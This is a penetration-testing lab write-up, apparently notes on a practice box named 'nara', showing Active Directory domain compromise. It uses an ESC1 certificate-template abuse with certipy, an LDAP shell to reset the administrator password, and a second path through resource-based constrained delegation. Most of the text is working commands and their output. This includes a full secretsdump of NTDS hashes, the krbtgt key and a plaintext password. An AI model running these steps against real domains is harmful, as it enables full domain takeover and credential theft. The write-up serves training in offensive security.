nara_Privilege_Escalation

ADCS

---

A vulnerable certificate template has been identified; NaraUser The vulnerability is ESC1

ESC1

---

The ESC1 vulnerability in Active Directory Certificate Services (AD CS) allows attackers to exploit misconfigured certificate templates that permit any authenticated user to request certificates. If such templates are configured to allow for certificate issuance without sufficient restrictions, attackers can obtain a certificate for an account they control, which can then be used for authentication and privilege escalation. This vulnerability is especially dangerous when default settings are left unchanged or improperly configured.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=tracy.white@nara.nara-security.com.ccache certipy-ad -debug req -template 'NaraUser' -ca 'NARA-CA' -upn administrator@nara-security.com -target nara -k -no-pass -ns $IP -target-ip $IP -dc-ip $IP -dc-host nara.nara-security.com
Certipy v5.0.2 - by Oliver Lyak (ly4k)
 
[+] Domain retrieved from CCache: NARA-SECURITY.COM
[+] Username retrieved from CCache: tracy.white
[+] Nameserver: '192.168.209.30'
[+] DC IP: '192.168.209.30'
[+] DC Host: 'nara.nara-security.com'
[+] Target IP: '192.168.209.30'
[+] Remote Name: 'nara'
[+] Domain: 'NARA-SECURITY.COM'
[+] Username: 'TRACY.WHITE'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Checking for Kerberos ticket cache
[+] Loaded Kerberos cache from tracy.white@nara.nara-security.com.ccache
[+] Using TGT from cache
[+] Username retrieved from CCache credential: tracy.white
[+] Getting TGS for 'HOST/nara'
[+] Got TGS for 'HOST/nara'
[+] Trying to connect to endpoint: ncacn_np:192.168.209.30[\pipe\cert]
[+] Connected to endpoint: ncacn_np:192.168.209.30[\pipe\cert]
[*] Request ID is 16
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@nara-security.com'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Successfully requested a template as the administrator user PFX file generated for the administrator user

Authentication (PKINIT Fail)

---

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ certipy-ad -debug auth -pfx administrator.pfx -domain NARA-SECURITY.COM -dc-ip $IP 
Certipy v5.0.2 - by Oliver Lyak (ly4k)
 
[+] Target name (-target) and DC host (-dc-host) not specified. Using domain '' as target name. This might fail for cross-realm operations
[+] Nameserver: '192.168.209.30'
[+] DC IP: '192.168.209.30'
[+] DC Host: ''
[+] Target IP: '192.168.209.30'
[+] Remote Name: '192.168.209.30'
[+] Domain: ''
[+] Username: ''
[*] Certificate identities:
[*]     SAN UPN: 'administrator@nara-security.com'
[*] Using principal: 'administrator@nara-security.com'
[*] Trying to get TGT...
[+] Sending AS-REQ to KDC nara-security.com (192.168.209.30)
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/certipy/commands/auth.py", line 596, in kerberos_authentication
    tgt = sendReceive(as_req, domain, self.target.target_ip)
  File "/usr/lib/python3/dist-packages/impacket/krb5/kerberosv5.py", line 93, in sendReceive
    raise krbError
impacket.krb5.kerberosv5.KerberosError: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
[-] See the wiki for more information

Attempting to authenticate using the PFX file of the administrator user fails with KDC_ERR_PADATA_TYPE_NOSUPP

The KDC_ERR_PADATA_TYPE_NOSUPP error means that the target KDC is not configured to support PKINIT authentication (Kerberos authentication with a certificate).

Authentication (LDAP Shell)

---

The target KDC, not supporting thee PKINIT authentication, does not mean that the generated PFX file is invalid. One way to verify this is via using the -ldap-shell flag in certipy-ad.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ certipy-ad -debug auth -pfx administrator.pfx -domain NARA-SECURITY.COM -dc-ip $IP -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)
 
[+] Target name (-target) and DC host (-dc-host) not specified. Using domain '' as target name. This might fail for cross-realm operations
[+] Nameserver: '192.168.209.30'
[+] DC IP: '192.168.209.30'
[+] DC Host: ''
[+] Target IP: '192.168.209.30'
[+] Remote Name: '192.168.209.30'
[+] Domain: ''
[+] Username: ''
[*] Certificate identities:
[*]     SAN UPN: 'administrator@nara-security.com'
[+] Authenticating to LDAP server using Schannel authentication
[*] Connecting to 'ldaps://192.168.209.30:636'
[*] Authenticated to '192.168.209.30' as: 'u:NARASEC\\Administrator'
[+] Bound to ldaps://192.168.209.30:636 - ssl
[+] Default path: DC=nara-security,DC=com
[+] Configuration path: CN=Configuration,DC=nara-security,DC=com
Type help for list of commands
 
# 

LDAP channel session established.

# whoami
u:NARASEC\Administrator

The current user is administrator

Password Reset

---

# help
 
 add_computer computer [password] [nospns] - Adds a new computer to the domain with the specified password. If nospns is specified, computer will be created with only a single necessary HOST SPN. Requires LDAPS.
 rename_computer current_name new_name - Sets the SAMAccountName attribute on a computer object to a new value.
 add_user new_user [parent] - Creates a new user.
 add_user_to_group user group - Adds a user to a group.
 change_password user [password] - Attempt to change a given user's password. Requires LDAPS.
 clear_rbcd target - Clear the resource based constrained delegation configuration information.
 disable_account user - Disable the user's account.
 enable_account user - Enable the user's account.
 dump - Dumps the domain.
 search query [attributes,] - Search users and groups by name, distinguishedName and sAMAccountName.
 get_user_groups user - Retrieves all groups this user is a member of.
 get_group_users group - Retrieves all members of a group.
 get_laps_password computer - Retrieves the LAPS passwords associated with a given computer (sAMAccountName).
 grant_control target grantee - Grant full control of a given target object (sAMAccountName) to the grantee (sAMAccountName).
 set_dontreqpreauth user true/false - Set the don't require pre-authentication flag to true or false.
 set_rbcd target grantee - Grant the grantee (sAMAccountName) the ability to perform RBCD to the target (sAMAccountName).
 start_tls - Send a StartTLS command to upgrade from LDAP to LDAPS. Use this to bypass channel binding for operations necessitating an encrypted channel.
 write_gpo_dacl user gpoSID - Write a full control ACE to the gpo for the given user. The gpoSID must be entered surrounding by {}.
 whoami - get connected user
 dirsync - Dirsync requested attributes
 exit - Terminates this session.

There are many ways to go from here. The most simple way is to just reset the password of the administrator user.

# change_password administrator Qwer1234
Got User DN: CN=Administrator,CN=Users,DC=nara-security,DC=com
Attempting to set new password of: Qwer1234
Password changed successfully!

Password successfully changed for the administrator user; Qwer1234

Validation

---

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ impacket-getTGT NARA-SECURITY.COM/administrator@nara.nara-security.com -dc-ip $IP         
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[*] Saving ticket in administrator@nara.nara-security.com.ccache

Validated against the KDC running on the DC host; nara.nara-security.com(192.168.209.30) TGT generated for the administrator user.

Hashdump

---

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=administrator@nara.nara-security.com.ccache impacket-secretsdump NARA-SECURITY.COM/@nara.nara-security.com -k -no-pass -dc-ip $IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x731c888adb6f9f25711d55f1c1463b88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d35c4ae45bdd10a4e28ff529a2155745:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
NARASEC\NARA$:plain_password_hex:b620cc6139bf0c25bfea542b4588fbf4fdc8ec0cd3cdfb88d597d807be81b637ea75209b5a4f14a2a611a1ed67fab21496a72c7ba2ec61c2e5bd4c384f7827be9f63caa3e8610b8c9addc42f82721cad002e90f014f7ddf5f0e8616e8c1ed688a504f754e24b83c9a6a59f4c31b2dbcd01f1f3572c6f9e0d2616f6bc5125819746e9ad9603792900bcd5b6148497b1bedfbd7d1d3ea4e28bf71e8bc507c2736e605d7e22cd04061365be209fb9ab8e6aa924eda3e9541be0d477b022d9dd1e3b12ca36a13d3782afc78199b8cba0b577d1709f2a5d7cb68f6e4feab3899b67f1605021ea8aac18d890c6073769ba4bb1
NARASEC\NARA$:aad3b435b51404eeaad3b435b51404ee:d78b968a49f9612f83797d3138220092:::
[*] DefaultPassword 
NARASEC\tracy.white:zqwj041FGX
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xa2966c2958c321ccc4470b54f485be069a050bc1
dpapi_userkey:0x5a6ed63075d897d7d3224c2c9b9cdcc254788003
[*] NL$KM 
 0000   08 9C 22 67 0B 44 1F 61  34 42 2A F7 DC 66 1E 24   .."g.D.a4B*..f.$
 0010   F3 1D CF 25 9C 00 4D 32  DF 02 F7 91 FA E6 12 92   ...%..M2........
 0020   CB 10 C4 83 14 A4 18 F6  EE F7 E2 5C AE AF 19 EA   ...........\....
 0030   56 F1 C2 9A 99 A6 8E 0A  11 48 D2 D7 07 70 52 2D   V........H...pR-
NL$KM:089c22670b441f6134422af7dc661e24f31dcf259c004d32df02f791fae61292cb10c48314a418f6eef7e25caeaf19ea56f1c29a99a68e0a1148d2d70770522d
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3f85c2c9778ce40492f6ac891f76b4ca:::
nara-security.com\Amelia.O'Brien:1104:aad3b435b51404eeaad3b435b51404ee:2a3bc4e4f627ae18128b63ca338249fb:::
nara-security.com\Damian.Johnson:1105:aad3b435b51404eeaad3b435b51404ee:6037e9a69dfa966cd902e35a5bd17568:::
nara-security.com\Helen.Robinson:1106:aad3b435b51404eeaad3b435b51404ee:3bef7be42235aeadf25df04f90c6e3d7:::
nara-security.com\Sara.O'Sullivan:1107:aad3b435b51404eeaad3b435b51404ee:bec726c5bea2f63e4798e0a559c53453:::
nara-security.com\Jasmine.Roberts:1108:aad3b435b51404eeaad3b435b51404ee:3d24b27a9beba394589bcefa51319e02:::
nara-security.com\Declan.Reynolds:1109:aad3b435b51404eeaad3b435b51404ee:ee174ee61eadd9b1f3d1f3225037068d:::
nara-security.com\Jodie.Summers:1110:aad3b435b51404eeaad3b435b51404ee:a241c861f1bfb5e2ae04c9e843304318:::
nara-security.com\Carolyn.Hill:1111:aad3b435b51404eeaad3b435b51404ee:d65fad2e9d1cf1c44de25751c60e37f6:::
nara-security.com\Jemma.Humphries:1112:aad3b435b51404eeaad3b435b51404ee:2884cf969a8cd830da7559ee60c9dd3c:::
nara-security.com\Tracy.White:1113:aad3b435b51404eeaad3b435b51404ee:510037c67d52760ca076ef199fd26c51:::
NARA$:1000:aad3b435b51404eeaad3b435b51404ee:d78b968a49f9612f83797d3138220092:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d9c06207ad449f679fcbcf7f8b2a54bc51139c64886dc6e123bdef569a828ad
Administrator:aes128-cts-hmac-sha1-96:0524697dc50b6facd6b72816b81092f2
Administrator:des-cbc-md5:d62676a29132d3dc
krbtgt:aes256-cts-hmac-sha1-96:6a69065d5bb66d8691a68e4a6baf4a4faf1a9db55519f394f56a8b3bffabe6a7
krbtgt:aes128-cts-hmac-sha1-96:40529a633c381f50435f82afd2c72614
krbtgt:des-cbc-md5:07df379e5b9e1afb
nara-security.com\Amelia.O'Brien:aes256-cts-hmac-sha1-96:efec45ff5ec03ad84fe1143ea5bbfa4472da4bc9978f48bafd6faeb800ddafa9
nara-security.com\Amelia.O'Brien:aes128-cts-hmac-sha1-96:90f0e123d917b5ae148570002a9ea68e
nara-security.com\Amelia.O'Brien:des-cbc-md5:e5c223ecd5c2a43b
nara-security.com\Damian.Johnson:aes256-cts-hmac-sha1-96:62eea72684a4c953644088f6eacdc10057542c4788c76bb853c8e9add298d933
nara-security.com\Damian.Johnson:aes128-cts-hmac-sha1-96:0bf5e1335518ae078364966f3f9a10d0
nara-security.com\Damian.Johnson:des-cbc-md5:6bb5a4b9e69b5d4c
nara-security.com\Helen.Robinson:aes256-cts-hmac-sha1-96:2fcd5f444651395d2dd0613791d1642578972137b277a4f04e5a7258d46ef5be
nara-security.com\Helen.Robinson:aes128-cts-hmac-sha1-96:5ed26dbf8e08910824a2b17767b13a54
nara-security.com\Helen.Robinson:des-cbc-md5:01c87a37d626f2f1
nara-security.com\Sara.O'Sullivan:aes256-cts-hmac-sha1-96:7518292bd462ed5d97c3467654d40213ecf706a0e86c4fb187d400ef97b89cba
nara-security.com\Sara.O'Sullivan:aes128-cts-hmac-sha1-96:f352274b2986a2e59d906a374fb85d8a
nara-security.com\Sara.O'Sullivan:des-cbc-md5:1f68401ac8673134
nara-security.com\Jasmine.Roberts:aes256-cts-hmac-sha1-96:95437346669685bc1bcbe515c38b2328d572b3ef0f53b880eb601a77d8ac5f93
nara-security.com\Jasmine.Roberts:aes128-cts-hmac-sha1-96:4f4a6b1665c6becce02164ef8a0ef278
nara-security.com\Jasmine.Roberts:des-cbc-md5:9b79b0fe9e025429
nara-security.com\Declan.Reynolds:aes256-cts-hmac-sha1-96:a0002536a0df7e30f25d2c20e8db408c12b5d656dee51ed36713dd60e12156e1
nara-security.com\Declan.Reynolds:aes128-cts-hmac-sha1-96:e9afb0e76f48fbfdd11dabc4303bc5b4
nara-security.com\Declan.Reynolds:des-cbc-md5:da2a86383b7a7c80
nara-security.com\Jodie.Summers:aes256-cts-hmac-sha1-96:20bf3cff2382312f3208f15115e4ab4e4166cee06eda65944a54395bcf623880
nara-security.com\Jodie.Summers:aes128-cts-hmac-sha1-96:482940121e3bf4c831e196a75c281288
nara-security.com\Jodie.Summers:des-cbc-md5:3ed0761fb337e667
nara-security.com\Carolyn.Hill:aes256-cts-hmac-sha1-96:eaa5f10ff42d92692a94cce7f979673214244fbeaefa72698c8605dda550fdfe
nara-security.com\Carolyn.Hill:aes128-cts-hmac-sha1-96:401579f65b47951a68c89a7072387f91
nara-security.com\Carolyn.Hill:des-cbc-md5:7343cd573180e9c7
nara-security.com\Jemma.Humphries:aes256-cts-hmac-sha1-96:ceca930e1aafbaf1e577dbafc3900b57b4eff2a0456d81e6f63eed78ddf37667
nara-security.com\Jemma.Humphries:aes128-cts-hmac-sha1-96:05f014977e7d8cde1e5329de97afd4f9
nara-security.com\Jemma.Humphries:des-cbc-md5:37e6f2106b7a9e75
nara-security.com\Tracy.White:aes256-cts-hmac-sha1-96:9e562dc6076f467d1906674f24e5a5a3760c5f07a509b5d194b3bfb864398d70
nara-security.com\Tracy.White:aes128-cts-hmac-sha1-96:ce3dc29bc3fa5e792086e594a2fe07f8
nara-security.com\Tracy.White:des-cbc-md5:322502078943d568
NARA$:aes256-cts-hmac-sha1-96:248be7240f10b250962e6abaf868bd9b9de688e296dceb0533b86bd8ad282543
NARA$:aes128-cts-hmac-sha1-96:bbdf7381cdd8ed61f42b48b89f42bed2
NARA$:des-cbc-md5:6d64d38c2c206d3e
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain level compromise

Shell Drop

---

System level compromise

RBCD (Resource-based Constrained Delegation)

---

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ certipy-ad -debug auth -pfx administrator.pfx -domain NARA-SECURITY.COM -dc-ip $IP -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)
 
[+] Target name (-target) and DC host (-dc-host) not specified. Using domain '' as target name. This might fail for cross-realm operations
[+] Nameserver: '192.168.209.30'
[+] DC IP: '192.168.209.30'
[+] DC Host: ''
[+] Target IP: '192.168.209.30'
[+] Remote Name: '192.168.209.30'
[+] Domain: ''
[+] Username: ''
[*] Certificate identities:
[*]     SAN UPN: 'administrator@nara-security.com'
[+] Authenticating to LDAP server using Schannel authentication
[*] Connecting to 'ldaps://192.168.209.30:636'
[*] Authenticated to '192.168.209.30' as: 'u:NARASEC\\Administrator'
[+] Bound to ldaps://192.168.209.30:636 - ssl
[+] Default path: DC=nara-security,DC=com
[+] Configuration path: CN=Configuration,DC=nara-security,DC=com
Type help for list of commands
 
# help
 
 add_computer computer [password] [nospns] - Adds a new computer to the domain with the specified password. If nospns is specified, computer will be created with only a single necessary HOST SPN. Requires LDAPS.
 rename_computer current_name new_name - Sets the SAMAccountName attribute on a computer object to a new value.
 add_user new_user [parent] - Creates a new user.
 add_user_to_group user group - Adds a user to a group.
 change_password user [password] - Attempt to change a given user's password. Requires LDAPS.
 clear_rbcd target - Clear the resource based constrained delegation configuration information.
 disable_account user - Disable the user's account.
 enable_account user - Enable the user's account.
 dump - Dumps the domain.
 search query [attributes,] - Search users and groups by name, distinguishedName and sAMAccountName.
 get_user_groups user - Retrieves all groups this user is a member of.
 get_group_users group - Retrieves all members of a group.
 get_laps_password computer - Retrieves the LAPS passwords associated with a given computer (sAMAccountName).
 grant_control target grantee - Grant full control of a given target object (sAMAccountName) to the grantee (sAMAccountName).
 set_dontreqpreauth user true/false - Set the don't require pre-authentication flag to true or false.
 set_rbcd target grantee - Grant the grantee (sAMAccountName) the ability to perform RBCD to the target (sAMAccountName).
 start_tls - Send a StartTLS command to upgrade from LDAP to LDAPS. Use this to bypass channel binding for operations necessitating an encrypted channel.
 write_gpo_dacl user gpoSID - Write a full control ACE to the gpo for the given user. The gpoSID must be entered surrounding by {}.
 whoami - get connected user
 dirsync - Dirsync requested attributes
 exit - Terminates this session.

There are many ways to go from here. Another method is via exploiting RBCD (Resource-based Constrained Delegation).

Adding Computer

---

# add_computer RBCD Qwer1234
Attempting to add a new computer with the name: RBCD$
Inferred Domain DN: DC=nara-security,DC=com
Inferred Domain Name: nara-security.com
New Computer DN: CN=RBCD,CN=Computers,DC=nara-security,DC=com
Adding new computer with username: RBCD$ and password: Qwer1234 result: OK

Creating a computer account; RBCD$:Qwer1234

Setting RBCD

---

# set_rbcd NARA$ RBCD$
Found Target DN: CN=NARA,OU=Domain Controllers,DC=nara-security,DC=com
Target SID: S-1-5-21-914744703-3800712539-3320214069-1000
 
Found Grantee DN: CN=RBCD,CN=Computers,DC=nara-security,DC=com
Grantee SID: S-1-5-21-914744703-3800712539-3320214069-4601
Delegation rights modified successfully!
RBCD$ can now impersonate users on NARA$ via S4U2Proxy

RBCD successful

Requesting Service Ticket (Impersonation)

---

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ impacket-getTGT 'NARA-SECURITY.COM/RBCD$@nara.nara-security.com' -dc-ip $IP                      
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[*] Saving ticket in RBCD$@nara.nara-security.com.ccache

Validated against the KDC running on the DC host; nara.nara-security.com(192.168.209.30) TGT generated for the generated computer account; RBCD$

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=RBCD\$@nara.nara-security.com.ccache impacket-getST 'NARA-SECURITY.COM/RBCD$@nara.nara-security.com' -k -no-pass -spn DNS/nara.nara-security.com -impersonate administrator -dc-ip $IP -debug  
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Using Kerberos Cache: RBCD$@nara.nara-security.com.ccache
[+] Returning cached credential for KRBTGT/NARA-SECURITY.COM@NARA-SECURITY.COM
[+] Using TGT from cache
[+] Username retrieved from CCache: RBCD$
[*] Impersonating administrator
[+] AUTHENTICATOR
Authenticator:
 authenticator-vno=5
 crealm=NARA-SECURITY.COM
 cname=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   RBCD$
 
 cusec=681954
 ctime=20250701171149Z
 
 
 
[+] S4UByteArray
 0000   01 00 00 00 61 64 6D 69  6E 69 73 74 72 61 74 6F   ....administrato
 0010   72 4E 41 52 41 2D 53 45  43 55 52 49 54 59 2E 43   rNARA-SECURITY.C
 0020   4F 4D 4B 65 72 62 65 72  6F 73                     OMKerberos
[+] CheckSum
 0000   09 39 EB E9 70 D3 DF BC  2B 6F 25 24 A1 E1 FA D9   .9..p...+o%$....
[+] PA_FOR_USER_ENC
PA_FOR_USER_ENC:
 userName=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   administrator
 
 userRealm=NARA-SECURITY.COM
 cksum=Checksum:
  cksumtype=-138
  checksum=0x0939ebe970d3dfbc2b6f2524a1e1fad9
 
 auth-package=Kerberos
 
[+] Final TGS
TGS_REQ:
 pvno=5
 msg-type=12
 padata=SequenceOf:
  PA_DATA:
   padata-type=1
   padata-value=0x6e82052f3082052ba003020105a10302010ea20703050000000000a382049f6182049b30820497a003020105a1131b114e4152412d53454355524954592e434f4da2263024a003020101a11d301b1b066b72627467741b114e4152412d53454355524954592e434f4da38204513082044da003020112a103020102a282043f0482043b6c71aa198ea2fc779037bde6646ff467f6edbef9f0e4fbf1c860851c95aefe273186442b2aa09c1b207804ce10e5daca8c9ebea7173a6db1c173e307d2b8b779c589df2ed0eca140aad7724af9aa41523b227f5311d1506cc59306d9310ee4c90df75438d155c2b98645d399007c2fbf29c13f26c0e6ffa40df73e9c59eb67fbfc6d7f6cb7505d29787b1b7f349f7dda796dd036412dcf5775064fee4bb747eea62c60ff43ff33be88ad5ad6a4c0c917757bfc921701cd54aae743bfadf3aeb93ba9d881fbfb4140e345103f392f79122f1c866565bb5e5f2c1755b3ad33d35ebed9ad1764b3c9e87bfdfbcb422b748021e1cd7b68ad7e984452a6432da895e6a1e58e1d8d4392295ae4ba060ffc8bd5d5f83b7033043f7f2c81b7a871ba2d72cc6ad969106878d5ac5511c4498e0b1d016365d160c84b1e792de6bb4ab7ae32c7fd192cf651036b4347fbde4dfe6c407fba26b067827555c89b1c25dcceec78f92143295e8b679daffb9bacfefde590c7a034abfedb2557284792442d064bcad7d384f8dc7e06d0c3782585be10c2a3606ca41d9a6c5adfb86755117bd13eea99e9b7e4b7a87d3c9b10c7087330c7d68178163c57424541890084d007c1e5d61f568d37e6afb3f4d674eb59d1f8aa45f4e88a4ddeeefdc7296ba94786776ccfd1e376c642fb4d31513fecc64c820ad685299d75ad0ece5b0ca2c281642a62083eebf62a835818016e460934162b02b583a053e48a77d6f887bba35e96e0c2ec8534b2ed849454ccf0decdd885dfc8578f7d06c3dbf01ee7a1d4b46d8fe43def145ee5d4a75ff8fe4778088c63a8ec780f12159f1866279f4e18a72acaca379abc3fab9632a242398d6d4cf53ada2b7207e3c1d13f5aa7dabbb4855c6c9e1fc9f5f0bd4e3b16b880262666dbdef8cf80162470fec663d907878d6c47bc2c220e875882efce96145ffede56a03ddf256d7a1a15f605dd6e375237e952a6c2b9fd8a5b78c9ccd76e2aa0c447c30bab9e7486e542b05ba5ef67158b3ba5bb95ce0ca5afb0d9cca566dcd57d2e76062a5a36729495683a35f96dbb6b8cdf694ec193e15a205eac198413bc09e1633cfdbb82d4b57d15f1db70a7e9563abfca1d78e2b73296347644a7502357fd9d0bcd2efe1f6453e819cf397687d9cd7cb2ee95de2e39f5a3d9304b4ba401095f4a5add8e35c0e6f2eb2ec5c74cd75bdcd2ecfbd4f256f30d3b2a6b74e4a68de91b538cb7ad15900ddcb4ef99a2c97e0a530853780818fe839272001e721be0b4e8e9fe86cf05f8e57255dd0ae5311f35cd53600e085ede99105b4fd29c7e4c51267e54cdb8b897c687284b81bae7da21eb31c88c200d3bbe61f0bba4ff4e4683b5b6bdcfa44fc24a134744588ebcd7eda6033e5b59feed53362b381745512ccacb6a1ba79ca9460d111517f05d84eaa5ca96809f119fd3d28738e6a3c51e71d14b47a877e526563e47e959f7f1f542278606d66233293c098050004bd2694f5c79ccf96e3969fce0875fe86aff8af6a4733071a003020112a26a04683fb9fabdac3abe261e1e74c7db6e28094dfc71797a7e40304fb95e0fd4932381bd35505fc390f70d976b09b0e86cc1241c73355c29037e064e9e923bcb667975613bbb53846513530cb6f2458c941bac4beeec29477e01702cc201cb380dfe4e3f97773038ffbe89
  PA_DATA:
   padata-type=129
   padata-value=0x305ba01a3018a003020101a111300f1b0d61646d696e6973747261746f72a1131b114e4152412d53454355524954592e434f4da21c301aa0040202ff76a11204100939ebe970d3dfbc2b6f2524a1e1fad9a30a1b084b65726265726f73
 
 req-body=KDC_REQ_BODY:
  kdc-options=1082195968
  realm=NARA-SECURITY.COM
  sname=PrincipalName:
   name-type=0
   name-string=SequenceOf:
    RBCD$
 
  till=20250702171149Z
  nonce=859755210
  etype=SequenceOf:
   18   23
 
 
[*] Requesting S4U2self
[+] Trying to connect to KDC at 192.168.209.30:88
[+] TGS_REP
TGS_REP:
 pvno=5
 msg-type=13
 crealm=NARA-SECURITY.COM
 cname=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   administrator
 
 ticket=Ticket:
  tkt-vno=5
  realm=NARA-SECURITY.COM
  sname=PrincipalName:
   name-type=0
   name-string=SequenceOf:
    RBCD$
 
  enc-part=EncryptedData:
   etype=23
   kvno=1
   cipher=0xb7feed04142633ce8858c970bb71cfa74cec26c4f13162946801944510fb0be307cb5e61335fd3bca2b45b28586bfeef2b2956faf72139c22517cd95b7e4b9989148b3f5969a2b2b2157526db573a0f548461d28db4cd2451f293ae19b8432697e3cc8a59f0705d01277d1815a59bda7c9c0cf6ef4c3f382b584ce33c298ba77a23bf55746d18fba5ac4d69ec2f6d672a8b06c1aa12bc45a04c4033aaff1ff4bbe7af1c8d1c5211a67ef4914795a27640e14966699596ee145044f506d3c4277dd3e0387947cabee05453b504cdfc095aa89c8855487c984ffc934ccf97f2749d6a5cb74457a569ad2de6a5e710a20ee719769e7dd5b527687313cb08ae1fc85c630eb87a023de7c4688feb5041853d2c94091dfd7024b4cd2f13519245ace781255a027f7e8359d7542028c7934d7370e172ac8abae25479ebf2cfad9cc5132ef33cdbfe36de4125bb2d03e18b302afcff040d294ff089e9f2cb2c5b3fa0fbb367bb7ae2d9824101708fd960fcf3ef08ba825298b78d7af69dc49ec464eebb9aa7c754ccc921276e7740b0d58783d7a5bf631e8b4e1bc9e24c8391429710ad64819a31c8ef2d283716976d8c2a8190fab60ec385c8421d70e4dd88074bf459bf6c1e10a97e15a4cd967763e162c3c252be43c8111ae37e9fb2df75587910734b286338b9ebddfdfac7c012a749aef092817662af7ab0a0dda99d4eb6f00f6ed59cc3491cb4945cd890adf52b6af34c4accc1ce081b582fab492ed83f3b27ce62fbbfc5eb1aadf7f907090beababd528011c1dd28f636a44adc216a668dbbfc16fb186becaaa7e5fb619be430751240cc51b5218262246eb5e4b7654aff51e8b7f6d907000e8bcc58d9f63135a153024a94addce690bc383a842da2daaabd7f75a913fe3f5ce9e091827e1070d3bdea4f7d7e21425189b637acca6fa9e3da068411c7e2f44d1c6178a0ba1cb7cd88d6dd7e1e91cd3c49c5aa99a004581565e14f20da23af4e352fa758e0161b3ec70c89b93f8315ea202b5c01e5d82a169d6f28a6f67c28c282b41645d80213af53e63b91279a01f4b23bb05beac29d5f5bbacee9d200c90ba49f3fa6c865c5e58b1e24648e7b138fb0205e33616bca9e8bce9688bc7d0f1705857e0aa71b0888faf1dddbdf17d038a0bb6d2b019bd9e9838a70e10a435b0f1c8f4c0097c02217096b38a0dae933902add364bc321ec03f9a268f08c04d4d6f0361622ffb440c97563fd2fadcc3be39a8240ecbfb32efb08e8ccc1738ddb998a2b342cb8d45a7d1a0144809bf412fec57c5282bb607ccf846c2f126c5a7a1aa77d391dec6f3eae8376d0b5932eb51023a0f65852081aa0a98198d3f5f4ba5d5ddfde9aa68ac5e3880c28cad5efd4143c69ccb69a9e2e5fd995d73f0aa30821ee0ea9b893fc74ca042fb313da73c54dabab625605c6928f14f57902f1361db2ab02f5b9d31117aac7c2c51da9a37d433bd33d0a8c5e5dfad3f5d58f53359e2e53091044e3fa8107caeefacb51db02b839df4a66a57eba793f5cddb28eacba1a9d1640207435c4cc4be4e6dd38b3e537948a9c97f77b25d5a63c2f55cda787bdca6bfed3038eb9a84951c19a5a1a8d5d78eac9e548c310fa6d727329932c5ef5536e0a0a6ebd803f493e668cc26de94d268e1362339778b16a1438f535c8218369620264a502200382f4c0c48b57a11deca035a07071e4e0c748c213c3b7dda23a8
 
 
 enc-part=EncryptedData:
  etype=18
  cipher=0x86c700bb2a91294a3c9974c37b9297e8f0de1e2ec35494aff37afedd90ce2ba73d1a73fc079453d71c11ab5b49367fe185c6f282cc989250d02f4fe8500ddc89ce9b669cab985ee5db849ec47273a6471ca7c3dc43ef25466893651ac96aa715a31fce6ac0d19583ee5fe7dc3d52a1f161dfb7f9c173e674ff96c62bf4069161090819f9950983f5542ca2d2f437aadd0e0ed29540a920b5b641cd992b5f0387ad8da9efcfc8f93237da98bcd2d673c6e37c55f57b78c567f72e042040eaf73d4eaf033808054ab799f1d00526cd2cffc60dcd73d5eac2b5563c2c4a0d112f5cb93332aae70fca81955fc61541b791abec086ad071b6029f337ae191b88629daaad0b4110b0c0a
 
 
[*] Requesting S4U2Proxy
[+] Trying to connect to KDC at 192.168.209.30:88
[*] Saving ticket in administrator@DNS_nara.nara-security.com@NARA-SECURITY.COM.ccache

Success.

Hashdump (RBCD)

---

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=administrator@DNS_nara.nara-security.com@NARA-SECURITY.COM.ccache impacket-secretsdump NARA-SECURITY.COM/@nara.nara-security.com -k -no-pass -dc-ip $IP 
